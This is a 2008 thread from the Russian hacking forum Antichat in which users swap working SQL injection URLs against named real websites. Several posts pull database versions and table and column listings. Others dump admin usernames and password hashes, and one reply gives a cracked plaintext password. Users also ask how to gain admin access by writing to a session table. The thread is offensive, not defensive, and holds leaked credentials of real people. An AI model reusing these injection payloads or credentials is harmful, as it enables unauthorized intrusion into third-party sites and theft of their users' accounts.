ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6631  
Старый 22.09.2008, 02:42
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от groupby  
Интересный сайт очень. Инъекцию обнаружил сразу, но там какая-то хитрая защита судя по всему имеется. В общем попробуйте:

http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14/*

все кроме цифр режется почему-то. Ни одну функцию заюзать не могу.
http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,0x76657273696F6E2829,0 x76657273696F6E2829,0x404076657273696F6E,7,8,0x766 57273696F6E2829,10,11,12,13,14/*

подстава одназначно
 
Ответить с цитированием

  #6632  
Старый 22.09.2008, 02:57
LUKAC
Новичок
Регистрация: 19.08.2007
Сообщений: 18
Провел на форуме:
182410

Репутация: 8
По умолчанию

http://www.rionews.com.ua/statja.php?id=11175+union+select+version(),2,3,4,5 ,6,7,8,9,0,1/*

4 версия
 
Ответить с цитированием

  #6633  
Старый 22.09.2008, 10:41
groupby
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017

Репутация: 61
По умолчанию

Цитата:
Сообщение от Pashkela  
http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,0x76657273696F6E2829,0 x76657273696F6E2829,0x404076657273696F6E,7,8,0x766 57273696F6E2829,10,11,12,13,14/*

подстава одназначно
С чего вдруг???
Если ты написал version() в 16ричном виде, то это уже не version(), а строка version(). тут никакой подставы. Тут фишка в другом совсем.
В других местах все параметры экранируются. Пробой только в этом месте. Вероятно CMS, на которой построен портал сначала сама обрабатывает урлы (режет лишнее и подозрительные слова), а потом передает дальше, в бажные скрипты ))). Скорее всего это можно обойти, но у меня вариантов пока нет.
 
Ответить с цитированием

  #6634  
Старый 22.09.2008, 11:47
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

Цитата:
Интересный сайт очень. Инъекцию обнаружил сразу, но там какая-то хитрая защита судя по всему имеется. В общем попробуйте:
http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14/*
все кроме цифр режется почему-то. Ни одну функцию заюзать не могу.
там php-nuke 6 версии, вот так можно выдрать логины хэши админов:

Код:
http://web.anir.mn/modules.php?name=News&file=article&sid=-99+union+select+1,2,3,4,pwd,aid,7,8,9,10,11,12,13,14+from+nuke_authors+limit+0,1/*
http://web.anir.mn/modules.php?name=News&file=article&sid=-99+union+select+1,2,3,4,pwd,aid,7,8,9,10,11,12,13,14+from+nuke_authors+limit+1,1/*
...
baska:d88e1207b4f325297ef25cb2b049b33b:
bete:217de01e5b8aad8ce45d75ddaa2a27a9:
eegiiz:4846eaa06bfc1fa22df6ebce7f390cc7:
aliye:aa70fea8443ea26ca24d204069147b71:
hehe:e10adc3949ba59abbe56e057f20f883e:123456
 
Ответить с цитированием

  #6635  
Старый 22.09.2008, 12:06
ilinsky
Новичок
Регистрация: 21.09.2008
Сообщений: 4
Провел на форуме:
19277

Репутация: 3
Отправить сообщение для ilinsky с помощью ICQ
По умолчанию

Доброе утро. http://sotka.ru/


Вот то что вытянул из базы (MSSQL)

NastrSet
infobj
NastrPhones
NastrList
Archive
History
Right_List
TV_Program
TreeList
Accessuars
accessuars_name
Hard
AllBase
History_Archive
Statii_Rubrics
AllPhone
Black_List
City
Instr
Constants
Statii_in_rubrics
sessions
>session_id
>session_user_id
>session_start
>session_time
>session_ip
>session_logged_in
>session_admin
Credits
sessions_keys
Glossary
TV_Picture
GuestBook
Jurnal
TV_Mistake
Jurnal_CFG
TV_Announce
Pictures
Mailer
Statii
Mailer_Log
Mistakes
Money
>id
>data
>num_subj
>num_credit
>credit
>in_out
>num_disp
Sotovik_Err
Digital_Tech
Operators
Pagers
Phones_S
RestrictedPhones
Users_contacts
Users_right
>id_user_rights
>id_rights_info
Users_rights_info
>id_right
>right_maxmess
>right_info
Users_list
>user_id
>user_active
>username
>user_password
>user_session_time
>user_lastvisit
>user_regdate
>user_email
>user_newpasswd
>user_notify
>user_regphone


Юзер с Id = 1 Это гость. С id=2 похоже на админа
Имя БД: Cotka
логин: Andre
хэш: 24f64722693735931efd98aa4bb37e9b

Скуль : http://sotka.ru/BS/view.asp?nm=SQLINJ

Также "Админка" http://sotka.ru/admin/
похоже ищет в таблице сессий ( вот тут session_admin) прежде чем пустить.

Вопрос вот такой: Там имеется табличка сессий, с соответствующими столбиками

Кто догадается как сделать UPDATE/INSERT ?
У меня не получается пока что
 
Ответить с цитированием

  #6636  
Старый 22.09.2008, 12:33
groupby
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017

Репутация: 61
Exclamation

Пароль юзера Andre: paradis

Насколько я знаю, внтури селекта ни Апдейт ни Инсерт невозможно выполнить. По крайней мере в мускуле
 
Ответить с цитированием

  #6637  
Старый 22.09.2008, 12:43
ilinsky
Новичок
Регистрация: 21.09.2008
Сообщений: 4
Провел на форуме:
19277

Репутация: 3
Отправить сообщение для ilinsky с помощью ICQ
По умолчанию

Цитата:
Сообщение от groupby  
Пароль юзера Andre: paradis

Насколько я знаю, внтури селекта ни Апдейт ни Инсерт невозможно выполнить. По крайней мере в мускуле

Ну это и не мускуль -) А пароль мне ничего не дал -(
Делов том что залогинившись и пойдя в админку меня выкинуло! Хотя вчера когда я залогинен небыл, на ее индекс меня пускало...
 
Ответить с цитированием

  #6638  
Старый 22.09.2008, 15:21
ilinsky
Новичок
Регистрация: 21.09.2008
Сообщений: 4
Провел на форуме:
19277

Репутация: 3
Отправить сообщение для ilinsky с помощью ICQ
По умолчанию

http://www.cotraj.ru


Скуль http://www.cotraj.ru/catalog.php?cat=1{SQLINJ}

Database Version: 4.0.26
Database name: wwwcotrajru
User name: cotraj@yox.hc.ru

information_schema не пустили, имя таблиц узнать не удалось,хостер рбк
 
Ответить с цитированием

  #6639  
Старый 22.09.2008, 16:28
luz3r
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600

Репутация: 850
По умолчанию

Цитата:
Сообщение от ilinsky  
http://www.cotraj.ru


Скуль http://www.cotraj.ru/catalog.php?cat=1{SQLINJ}

Database Version: 4.0.26
Database name: wwwcotrajru
User name: cotraj@yox.hc.ru

information_schema не пустили, имя таблиц узнать не удалось,хостер рбк
Очень содержательная скуль...кол-ва столбцов нет , с каких пор в 4.0.26 существует таблица information_schema ? =\ Она есть в версиях >5
 
Ответить с цитированием

  #6640  
Старый 22.09.2008, 16:54
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.terrorism.com/index.php?catid=-1+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ